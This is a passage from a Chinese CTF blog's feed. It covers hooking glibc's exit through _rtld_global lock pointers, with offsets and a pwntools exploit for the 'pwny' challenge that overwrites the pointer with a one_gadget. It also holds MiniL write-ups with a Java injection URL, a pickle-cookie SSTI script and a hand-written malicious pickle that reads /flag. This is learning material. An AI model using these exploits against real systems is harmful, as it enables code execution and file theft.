{</span><br><span class="line"> mutex = {</span><br><span class="line"> __data = {</span><br><span class="line"> __lock = 0,</span><br><span class="line"> __count = 0,</span><br><span class="line"> __owner = 0,</span><br><span class="line"> __nusers = 0,</span><br><span class="line"> __kind = 1,</span><br><span class="line"> __spins = 0,</span><br><span class="line"> __elision = 0,</span><br><span class="line"> __list = {</span><br><span class="line"> __prev = 0x0,</span><br><span class="line"> __next = 0x0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> __size = <span class="string">'\000'</span> <repeats 16 <span class="built_in">times</span>>, <span class="string">"\001"</span>, <span class="string">'\000'</span> <repeats 22 <span class="built_in">times</span>>,</span><br><span class="line"> __align = 0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> _dl_load_adds = 4,</span><br><span class="line"> _dl_initfirst = 0x0,</span><br><span class="line"> _dl_cpuclock_offset = 21967126905434,</span><br><span class="line"> _dl_profile_map = 0x0,</span><br><span class="line"> _dl_num_relocations = 88,</span><br><span class="line"> _dl_num_cache_relocations = 3,</span><br><span class="line"> _dl_all_dirs = 0x7ffff7ffec90,</span><br><span class="line"> _dl_rtld_map = {</span><br><span class="line"> l_addr = 140737351856128,</span><br><span class="line"> l_name = 0x400238 <span class="string">"/lib64/ld-linux-x86-64.so.2"</span>,</span><br><span class="line"> l_ld = 0x7ffff7ffce68,</span><br><span class="line"> l_next = 0x0,</span><br><span class="line"> l_prev = 0x7ffff7`fd`9000,</span><br><span class="line"> l_real = 0x7ffff7f`fd`9f0 <_rtld_global+2448>,</span><br><span class="line"> l_ns = 0,</span><br><span class="line"> l_libname = 0x7ffff7ffe030 <_dl_rtld_libname>,</span><br><span class="line"> l_info = {0x0, 0x0, 0x7ffff7ffcee8, 0x7ffff7ffced8, 0x7ffff7ffce78, 0x7ffff7ffce98, 0x7ffff7ffcea8, 0x7ffff7ffcf18, 0x7ffff7ffcf28, 0x7ffff7ffcf38, 0x7ffff7ffceb8, 0x7ffff7ffcec8, 0x0, 0x0, 0x7ffff7ffce68, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7ffcef8, 0x0, 0x0, 0x7ffff7ffcf08, 0x0 <repeats 12 <span class="built_in">times</span>>, 0x7ffff7ffcf58, 0x7ffff7ffcf48, 0x0, 0x0, 0x7ffff7ffcf78, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7ffcf68, 0x0 <repeats 25 <span class="built_in">times</span>>, 0x7ffff7ffce88},</span><br><span class="line"> l_phdr = 0x7ffff7dd3040,</span><br><span class="line"> l_entry = 0,</span><br><span class="line"> l_phnum = 7,</span><br><span class="line"> l_ldnum = 0,</span><br><span class="line"> l_searchlist = {</span><br><span class="line"> r_list = 0x0,</span><br><span class="line"> r_nlist = 0</span><br><span class="line"> },</span><br><span class="line"> l_symbolic_searchlist = {</span><br><span class="line"> r_list = 0x0,</span><br><span class="line"> r_nlist = 0</span><br><span class="line"> },</span><br><span class="line"> l_loader = 0x0,</span><br><span class="line"> l_versions = 0x7ffff7`fd`98d0,</span><br><span class="line"> l_nversions = 6,</span><br><span class="line"> l_nbuckets = 17,</span><br><span class="line"> l_gnu_bitmask_idxbits = 3,</span><br><span class="line"> l_gnu_shift = 8,</span><br><span class="line"> l_gnu_bitmask = 0x7ffff7dd32d8,</span><br><span class="line"> {</span><br><span class="line"> l_gnu_buckets = 0x7ffff7dd32f8,</span><br><span class="line"> l_chain = 0x7ffff7dd32f8</span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> l_gnu_chain_zero = 0x7ffff7dd3338,</span><br><span class="line"> l_buckets = 0x7ffff7dd3338</span><br><span class="line"> },</span><br><span class="line"> l_direct_opencount = 0,</span><br><span class="line"> l_type = lt_library,</span><br><span class="line"> l_relocated = 1,</span><br><span class="line"> l_init_called = 1,</span><br><span class="line"> l_global = 1,</span><br><span class="line"> l_reserved = 0,</span><br><span class="line"> l_phdr_allocated = 0,</span><br><span class="line"> l_soname_added = 0,</span><br><span class="line"> l_faked = 0,</span><br><span class="line"> l_need_tls_init = 0,</span><br><span class="line"> l_auditing = 0,</span><br><span class="line"> l_audit_any_plt = 0,</span><br><span class="line"> l_removed = 0,</span><br><span class="line"> l_contiguous = 0,</span><br><span class="line"> l_symbolic_in_local_scope = 0,</span><br><span class="line"> l_free_initfini = 0,</span><br><span class="line"> l_rpath_dirs = {</span><br><span class="line"> <span class="built_in">dirs</span> = 0x0,</span><br><span class="line"> malloced = 0</span><br><span class="line"> },</span><br><span class="line"> l_reloc_result = 0x0,</span><br><span class="line"> l_versyms = 0x7ffff7dd3914,</span><br><span class="line"> l_origin = 0x0,</span><br><span class="line"> l_map_start = 140737351856128,</span><br><span class="line"> l_map_end = 140737354129776,</span><br><span class="line"> l_text_end = 140737351992656,</span><br><span class="line"> l_scope_mem = {0x0, 0x0, 0x0, 0x0},</span><br><span class="line"> l_scope_max = 0,</span><br><span class="line"> l_scope = 0x0,</span><br><span class="line"> l_local_scope = {0x0, 0x0},</span><br><span class="line"> l_file_id = {</span><br><span class="line"> dev = 0,</span><br><span class="line"> ino = 0</span><br><span class="line"> },</span><br><span class="line"> l_runpath_dirs = {</span><br><span class="line"> <span class="built_in">dirs</span> = 0x0,</span><br><span class="line"> malloced = 0</span><br><span class="line"> },</span><br><span class="line"> l_initfini = 0x0,</span><br><span class="line"> l_reldeps = 0x0,</span><br><span class="line"> l_reldepsmax = 0,</span><br><span class="line"> l_used = 1,</span><br><span class="line"> l_feature_1 = 0,</span><br><span class="line"> l_flags_1 = 0,</span><br><span class="line"> l_flags = 0,</span><br><span class="line"> l_idx = 0,</span><br><span class="line"> l_mach = {</span><br><span class="line"> plt = 0,</span><br><span class="line"> gotplt = 0,</span><br><span class="line"> tlsdesc_table = 0x0</span><br><span class="line"> },</span><br><span class="line"> l_lookup_cache = {</span><br><span class="line"> sym = 0x7ffff7dd3480,</span><br><span class="line"> type_class = 1,</span><br><span class="line"> value = 0x7ffff7`fd`9000,</span><br><span class="line"> ret = 0x7ffff79e70e8</span><br><span class="line"> },</span><br><span class="line"> l_tls_initimage = 0x0,</span><br><span class="line"> l_tls_initimage_size = 0,</span><br><span class="line"> l_tls_blocksize = 0,</span><br><span class="line"> l_tls_align = 0,</span><br><span class="line"> l_tls_firstbyte_offset = 0,</span><br><span class="line"> l_tls_offset = 0,</span><br><span class="line"> l_tls_modid = 0,</span><br><span class="line"> l_tls_dtor_count = 0,</span><br><span class="line"> l_relro_addr = 2266752,</span><br><span class="line"> l_relro_size = 2432,</span><br><span class="line"> l_serial = 0,</span><br><span class="line"> l_audit = 0x7ffff7f`fd`e60 <_rtld_global+3584></span><br><span class="line"> },</span><br><span class="line"> audit_data = {{</span><br><span class="line"> cookie = 0,</span><br><span class="line"> bindflags = 0</span><br><span class="line"> } <repeats 16 <span class="built_in">times</span>>},</span><br><span class="line"> _dl_rtld_lock_recursive = 0x7ffff7dd40e0 <rtld_lock_default_lock_recursive>,</span><br><span class="line"> _dl_rtld_unlock_recursive = 0x7ffff7dd40f0 <rtld_lock_default_unlock_recursive>,</span><br><span class="line"> _dl_make_stack_executable_hook = 0x7ffff7de6ea0 <__GI__dl_make_stack_executable>,</span><br><span class="line"> _dl_stack_flags = 6,</span><br><span class="line"> _dl_tls_dtv_gaps = <span class="literal">false</span>,</span><br><span class="line"> _dl_tls_max_dtv_idx = 1,</span><br><span class="line"> _dl_tls_dtv_slotinfo_list = 0x7ffff7`fd`9960,</span><br><span class="line"> _dl_tls_static_nelem = 1,</span><br><span class="line"> _dl_tls_static_size = 4160,</span><br><span class="line"> _dl_tls_static_used = 144,</span><br><span class="line"> _dl_tls_static_align = 64,</span><br><span class="line"> _dl_initial_dtv = 0x7ffff7`fd`ae10,</span><br><span class="line"> _dl_tls_generation = 1,</span><br><span class="line"> _dl_init_static_tls = 0x7ffff7ddf780 <_dl_nothread_init_static_tls>,</span><br><span class="line"> _dl_wait_lookup_done = 0x0,</span><br><span class="line"> _dl_scope_free_list = 0x0</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>我们只要修改这个指针就可以实现<code>exit</code>函数<code>hook</code>了(这么长一个结构体,是不是都能hook……我瞎想的……</p><p>现在知道了原理,我们要<code>hook</code>的话还需要知道<code>rtld_lock_default_lock_recursive</code>和<code>rtld_lock_default_unlock_recursive</code>的偏移:</p><blockquote><p><code>libc2.23</code>下偏移为0×5f0040,两个hook的偏移为3848和3850</p><p><code>libc2.27</code>下偏移为0×61b060,两个hook的偏移为3840和3848</p></blockquote><ul><li><p><code>_IO_cleanup</code></p><p>这个看名称很明显是清理缓冲区,把缓冲区中的东西该输入输入该输出输出(感觉主要是把缓冲区没有输出的东西输出到<code>stdout</code>……具体这里做了什么工作以及功能不是很大清楚,只是之前在做题的时候遇到一个问题:</p><blockquote><p><code>get_started_3dsctf_2016</code>:</p><p>在进行栈溢出后,一般<code>rop</code>链最后的返回地址都是胡写的……一般都是<code>0xdeadbeaf</code>,然而这样子构造的话,<code>flag</code>是没有输出的。但是如果最后的返回地址写<code>exit</code>函数的话,就有输出,原理就是<code>exit</code>函数里面调用了<code>\_IO\_cleanup</code>函数,清理了缓冲区</p></blockquote></li></ul><h2 id="example-ciscn-2021pwny"><a href="#example-ciscn-2021pwny" class="headerlink" title="example ciscn 2021pwny"></a><code>example</code> <code>ciscn 2021pwny</code></h2><p>就用最新的题来说吧……</p><p>主函数:</p><p><img src="/images/exit/image-20210520141741337.png" class="lazyload" data-srcset="/images/exit/image-20210520141741337.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210520141741337"></p><p>初始化函数:</p><p><img src="/images/exit/image-20210520141221364.png" class="lazyload" data-srcset="/images/exit/image-20210520141221364.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210520141221364"></p><p>这里将<code>fd</code>设为<code>random</code>并且存到<code>bss</code>上,然后就是两个功能函数:</p><p><img src="/images/exit/image-20210520141925177.png" class="lazyload" data-srcset="/images/exit/image-20210520141925177.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210520141925177"></p><p><img src="/images/exit/image-20210520141805749.png" class="lazyload" data-srcset="/images/exit/image-20210520141805749.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210520141805749"></p><p>再看一下<code>write_self</code>函数在<code>bss</code>段上的储存:<img src="/images/exit/image-20210520142616632.png" class="lazyload" data-srcset="/images/exit/image-20210520142616632.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210520142616632"></p><p>这里数据储存没有进行边界检查,所以我们可以通过控制Index进行任意地址读和任意地址写……但是由于<code>fd</code>的缘故,我们无法控制输入。现在只要能把输入修改成<code>stdin</code>也就是加<code>bss</code>端上存储的<code>fd</code>修改为0,那么我们便可以拿到<code>shell</code>……</p><p>我们如果在<code>read</code>的时候让程序用随机数修改<code>bss</code>段上的<code>fd</code>,那么基本上肯定的是程序无法修改后的<code>fd</code>中读取到信息。把如果我们这个时候强行读数据呢?我们写个例子看一下:</p><p><img src="/images/exit/image-20210520151347815.png" class="lazyload" data-srcset="/images/exit/image-20210520151347815.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210520151347815"></p><p>由此我们可以知道read函数在从未定义的<code>fd</code>读取数据的时候会读到寂寞然后返回-1,并不会<code>crash</code>。</p><p>那我们从<code>write_self</code>函数很明显就能发现如果我们修改了<code>fd</code>,然后再用修改后的<code>fd</code>读数据修改<code>fd</code>,那么此时的<code>v2</code>就没有变化还是0直接赋值给<code>bss</code>段上的<code>fd</code>,<code>fd</code>就会变为0。</p><p>此时我们才算实现了任意地址任意写。</p><p>我们发现主函数的结束使用<code>exit</code>函数实现的……它是不是在暗示我们什么</p><p>所以我们的思路就是先修改<code>fd</code>为0,再任意地址读获取<code>libc_base</code>,然后再任意地址写来实现<code>hook exit</code>函数。</p><p>还有一点需要注意的就是在实现任意地址读的时候需要算偏移,注意以下代码:</p><p><img src="/images/exit/image-20210520175121487.png" class="lazyload" data-srcset="/images/exit/image-20210520175121487.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210520175121487"></p><p><code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line">p=process([<span class="string">'./pwny'</span>],env={<span class="string">"LD_PRELOAD"</span>:<span class="string">"./libc-2.27.so"</span>})</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">index,second</span>):</span></span><br><span class="line"> p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line"> p.sendline(<span class="string">'2'</span>)</span><br><span class="line"> p.recvuntil(<span class="string">'Index: '</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"> <span class="keyword">if</span> second != <span class="string">'null'</span>:</span><br><span class="line"> p.sendline(second)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line"> p.sendline(<span class="string">'1'</span>)</span><br><span class="line"> p.recvuntil(<span class="string">'Index: '</span>)</span><br><span class="line"> p.sendline(index)</span><br><span class="line"> p.recvuntil(<span class="string">'Result: '</span>)</span><br><span class="line"> </span><br><span class="line"><span class="comment">#`fd`_urandom=0</span></span><br><span class="line">write(<span class="number">256</span>,<span class="string">'null'</span>)</span><br><span class="line">write(<span class="number">256</span>,<span class="string">'null'</span>) <span class="comment">#两遍读修改`fd`为0</span></span><br><span class="line"></span><br><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFFA</span>))</span><br><span class="line">libc_base=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)-<span class="number">0x3EBA00</span></span><br><span class="line">print(<span class="string">'libc_base'</span>,<span class="built_in">hex</span>(libc_base))</span><br><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFF5</span>))</span><br><span class="line">base=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)-<span class="number">0x202008</span></span><br><span class="line">print(<span class="string">'base'</span>,<span class="built_in">hex</span>(base))</span><br><span class="line"></span><br><span class="line">dl_rtld_unlock_recursive=libc_base+<span class="number">0x61BF68</span></span><br><span class="line">index=(dl_rtld_unlock_recursive-(base+<span class="number">0x202060</span>))//<span class="number">8</span></span><br><span class="line">one_gadget=libc_base+<span class="number">0x10a428</span></span><br><span class="line">write(index,p64(one_gadget))</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> PWN </tag>
</tags>
</entry>
<entry>
<title>2021MiniL 7!u!w</title>
<link href="2021/05/13/MiniL-7-u-w/"/>
<url>2021/05/13/MiniL-7-u-w/</url>
<content type="html"><![CDATA[<h1 id="MiniL"><a href="#MiniL" class="headerlink" title="MiniL"></a>MiniL</h1><p><font color="green"><strong>URL</strong>:<a href="https://ctf.xidian.edu.cn/#/index">https://ctf.xidian.edu.cn/#/index</a><br><br><strong>Team</strong>:7!u!w<br><br><strong>Members</strong>:Noah && Wanan && BB<br><br><strong>Start Time</strong>: 5.06 20:00<br><br><strong>End Time</strong>: 5.12 20:00</font></p><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="WEB1-easy-java-Worked-Wanan-amp-Noah"><a href="#WEB1-easy-java-Worked-Wanan-amp-Noah" class="headerlink" title="WEB1-easy_java | Worked: Wanan&Noah"></a>WEB1-easy_java | Worked: <code>Wanan</code>&Noah</h3><h4 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h4><figure class="highlight haskell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title">http</span>://<span class="number">8</span>a9b571f<span class="number">-0700</span><span class="number">-4244</span><span class="number">-98e6</span>-df5692c7de61.web.woooo.tech//?code=(new java.io.<span class="type">BufferedReader</span>(new java.io.<span class="type">FileReader</span>(<span class="string">"/flag"</span>))).readLine()</span><br></pre></td></tr></table></figure><hr><h3 id="WEB2-L-inc-Worked-Wanan-amp-Noah"><a href="#WEB2-L-inc-Worked-Wanan-amp-Noah" class="headerlink" title="WEB2-L inc. | Worked: Wanan&Noah"></a>WEB2-L <code>inc</code>. | Worked: <code>Wanan</code>&Noah</h3><h4 id="预期解"><a href="#预期解" class="headerlink" title="预期解"></a>预期解</h4><p><code>base64</code>解码后,将序列化字符串中的<code>NEWFALSE(0x89)</code>修改为<code>NEWTRUE(0x88)</code>,即可以正常登录。</p><p>使用<code>pickle</code>和<code>pickletools</code>进行序列化与反序列化。</p><p>登陆后用户名处存在SSTI,将用户名修改为注入payload。</p><h5 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># WEB2-1.py</span></span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode <span class="keyword">as</span> be</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">url = <span class="built_in">input</span>(<span class="string">"\033[1;34m[^_^] ? Input Target Url: \033[0m"</span>) + <span class="string">"home"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> code = <span class="string">"{{"</span> + <span class="built_in">input</span>(<span class="string">"\033[1;34m[^_^] > \033[0m"</span>).replace(<span class="string">"\""</span>, <span class="string">"\'"</span>) + <span class="string">"}}"</span></span><br><span class="line"> code_len = <span class="built_in">hex</span>(<span class="built_in">len</span>(code))[<span class="number">2</span>:]</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(code_len) > <span class="number">2</span>:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] ! Code length limit breakthrough, limit: 0xff.\033[0m"</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(code_len) == <span class="number">1</span>:</span><br><span class="line"> code_len = <span class="string">"0"</span> + code_len</span><br><span class="line"> code_len = <span class="string">r"\x"</span> + code_len</span><br><span class="line"> basestr = [<span class="string">r"\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x03app\x94\x8c\x04User\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c"</span>, <span class="string">r"\x94\x8c\x03vip\x94\x88ub."</span>]</span><br><span class="line"> payload = <span class="string">"b\""</span> + basestr[<span class="number">0</span>] + code_len + code + basestr[<span class="number">1</span>] + <span class="string">"\""</span></span><br><span class="line"> <span class="comment"># print(eval(payload))</span></span><br><span class="line"> payload_b = be(<span class="built_in">eval</span>(payload)).decode()</span><br><span class="line"> header = {</span><br><span class="line"> <span class="string">"Cookie"</span>: <span class="string">"user="</span> + payload_b,</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> response = requests.get(url=url, headers=header)</span><br><span class="line"> pattern = re.<span class="built_in">compile</span>(<span class="string">r'<h1>Hello, dear ([\w\W]*)</h1>'</span>)</span><br><span class="line"> result = re.search(pattern, response.text)</span><br><span class="line"> <span class="keyword">if</span> result:</span><br><span class="line"> print(result.group(<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] ! Error, no response context find.\033[0m"</span>)</span><br><span class="line"> <span class="keyword">except</span> requests.ConnectionError:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] ! Error, examine your network connection.\033[0m"</span>)</span><br></pre></td></tr></table></figure><h4 id="非预期"><a href="#非预期" class="headerlink" title="非预期"></a>非预期</h4><p>猜测<code>flag</code>在<code>/flag</code>,手写<code>opcode</code>将用户名处写成<code>flag</code>然后回显出来</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># WEB2-2.py</span></span><br><span class="line"><span class="keyword">import</span> app</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">data = <span class="string">b"""capp</span></span><br><span class="line"><span class="string">User</span></span><br><span class="line"><span class="string">(c__builtin__</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string">p0</span></span><br><span class="line"><span class="string">(c__builtin__</span></span><br><span class="line"><span class="string">open</span></span><br><span class="line"><span class="string">(S'/flag'</span></span><br><span class="line"><span class="string">tRS'read'</span></span><br><span class="line"><span class="string">tRp1</span></span><br><span class="line"><span class="string">)RI01</span></span><br><span class="line"><span class="string">tR."""</span></span><br><span class="line"></span><br><span class="line">print(base64.b64encode(data))</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># app.py</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span>(<span class="params"><span class="built_in">object</span></span>):</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self, name, vip</span>):</span></span><br><span class="line"> self.name = name</span><br><span class="line"> self.vip = vip</span><br></pre></td></tr></table></figure><p>学会了怎么手写<code>opcode</code>,收获颇丰</p><hr><h3 id="WEB3-template-Worked-Wanan-amp-Noah"><a href="#WEB3-template-Worked-Wanan-amp-Noah" class="headerlink" title="WEB3-template | Worked: Wanan&Noah"></a>WEB3-template | Worked: <code>Wanan</code>&Noah</h3><p>先手动去了个混淆,发现对花括号和百分号的过滤在前端,直接向<code>/build</code>发请求即可,然后就是ssti过滤的绕过</p><p>去混淆后的JS代码:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// script.js</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">abc</span>(<span class="params">a, b</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> la = a[<span class="string">'length'</span>];</span><br><span class="line"> <span class="keyword">var</span> lb = b[<span class="string">'length'</span>];</span><br><span class="line"> <span class="keyword">var</span> ans = [];</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < lb; i++) {</span><br><span class="line"> ans[i] = <span class="built_in">String</span>.fromCharCode(a[i % la].charCodeAt(<span class="number">0</span>) ^ b[i].charCodeAt(<span class="number">0</span>));</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> ans[<span class="string">'join'</span>](<span class="string">''</span>);</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">de</span>(<span class="params">a1, a2</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> abc(a1, atob(a2));</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">submit</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> input = <span class="built_in">document</span>.getElementById(<span class="string">'code'</span>)[<span class="string">'value'</span>];</span><br><span class="line"> <span class="keyword">if</span> (input.search(<span class="string">'{|}|%'</span>) !== -<span class="number">1</span>) {</span><br><span class="line"> alert(<span class="string">'hack!!!!!'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">var</span> key = abc(<span class="string">'xdsecminil'</span>, input);</span><br><span class="line"> <span class="keyword">var</span> XMLResponce = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line"> XMLResponce.open(<span class="string">'POST'</span>, <span class="string">'/build'</span>, <span class="literal">true</span>);</span><br><span class="line"> XMLResponce.setRequestHeader(<span class="string">'Content-type'</span>, <span class="string">'application/x-www-form-urlencoded'</span>);</span><br><span class="line"> <span class="keyword">var</span> data = <span class="string">'data='</span> + btoa(key);</span><br><span class="line"> XMLResponce.send(data);</span><br><span class="line"> XMLResponce.onreadystatechange = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (XMLResponce.status === <span class="number">200</span>) {</span><br><span class="line"> <span class="built_in">document</span>.getElementById(<span class="string">'result'</span>).innerText = XMLResponce.responseText;</span><br><span class="line"> } <span 